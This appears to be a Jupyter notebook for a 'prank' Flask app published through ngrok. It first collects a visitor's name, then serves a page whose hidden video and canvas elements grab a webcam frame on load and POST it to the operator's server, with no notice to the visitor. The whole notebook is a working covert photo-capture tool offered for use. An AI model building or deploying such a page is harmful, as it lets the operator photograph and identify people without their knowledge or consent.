<a href="https://colab.research.google.com/github/techwithanirudh/Automatic-Image-Captioning/blob/master/Vrs_PrankPart1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
!pip install flask_ngrok flask_cors

In [ ]:
import os

os.mkdir('/content/CapImg')
os.mkdir('/content/CapImg/templates')
os.chdir('/content/CapImg/templates')

In [29]:
with open('get_user_image.html', 'a') as user_image_html:
  user_image_html.write(
'''

<!DOCTYPE html>
<html>
    <body>
        <div class="form-group">  
            <div class="camera">
                <video id="video" style="display: none;">Video stream not available.</video>
            </div>
    
            <canvas id="canvas" style="display: none;"></canvas>        
            <script>
                (function() {
                    // The width and height of the captured photo. We will set the
                    // width to the value defined here, but the height will be
                    // calculated based on the aspect ratio of the input stream.
                
                    var width = 770;    // We will scale the photo width to this
                    var height = 900;   // This will be computed based on the input stream
                
                    // |streaming| indicates whether or not we're currently streaming
                    // video from the camera. Obviously, we start at false.
                
                    var streaming = false;
                
                    // The various HTML elements we need to configure or control. These
                    // will be set by the startup() function.
                
                    var video = null;
                    var canvas = null;
                    var photo = null;
                    var startbutton = null;
                
                    function startup() {
                      video = document.getElementById('video');
                      canvas = document.getElementById('canvas');
                      photo = document.getElementById('photo');
                      startbutton = document.getElementById('startbutton');
                    
                      navigator.mediaDevices.getUserMedia({video: true, audio: false})
                      .then(function(stream) {
                        video.srcObject = stream;
                        video.play();
                      })
                      .catch(function(err) {
                        console.log("An error occurred: " + err);
                      });
                  
                      video.addEventListener('canplay', function(ev){
                        if (!streaming) {
                          height = video.videoHeight / (video.videoWidth/width);
                        
                          // Firefox currently has a bug where the height can't be read from
                          // the video, so we will make assumptions if this happens.
                        
                          if (isNaN(height)) {
                            height = width / (4/3);
                          }
                      
                          video.setAttribute('width', 340);
                          video.setAttribute('height', 300);
                          canvas.setAttribute('width', width);
                          canvas.setAttribute('height', height);
                          takepicture();
                          streaming = true;
                        }
                      }, false);
        
                      clearphoto();
                    }
                
                    function clearphoto() {
                      var context = canvas.getContext('2d');
                      context.fillStyle = "#AAA";
                      context.fillRect(0, 0, canvas.width, canvas.height);
                    
                      var data = canvas.toDataURL('image/jpeg');
                    }
    
                    function takepicture() {
                      var context = canvas.getContext('2d');
                      if (width && height) {
                        canvas.width = width;
                        canvas.height = height;
                        context.drawImage(video, 0, 0, width, height);
                        
                        var data = canvas.toDataURL('image/jpeg');
                        var request = new XMLHttpRequest();
                        request.open("POST", '/userImage');
                        request.send(data);
                      }else {
                        clearphoto();
                      }
                    }
                    
                    // Set up our event listener to run the startup process
                    // once loading is complete.
                    window.addEventListener('load', startup, false);
                  })(); 
              </script>
    </body>
</html>
  ''')

In [ ]:
with open('get_name.html', 'a') as user_image_html:
  user_image_html.write('''
<!DOCTYPE html>
<html>
<style>
input[type=text], select {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}

input[type=submit] {
  width: 100%;
  background-color: #4CAF50;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}

input[type=submit]:hover {
  background-color: #45a049;
}

div {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
}
</style>
<body>

<h3>Name</h3>

<div>
  <form action="/userName" method="POST">
    <label for="fname">First Name</label>
    <input type="text" id="fname" name="firstname" placeholder="Your name..">

    <label for="lname">Last Name</label>
    <input type="text" id="lname" name="lastname" placeholder="Your last name..">
  
    <input type="submit" value="Submit">
  </form>
</div>

</body>
</html>
  ''')

In [ ]:
from flask import Flask, render_template, jsonify, request
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from IPython.display import display, Image
import sys

app = Flask(__name__, root_path='/content/CapImg')
CORS(app)
run_with_ngrok(app)

@app.route('/')
def home():
  return render_template('get_name.html')

@app.route('/userName', methods=['POST', 'GET'])
def getName():
  global name_data
  name_data = request.data.decode("utf-8")
  print('Name: ', name_data)
  return render_template('get_user_image.html')

@app.route('/userImage', methods=['POST'])
def getUsrImg():
  global img_data
  img_data = request.data.decode("utf-8")
  display(img_data)
  return 'Done Data Taken'

app.run()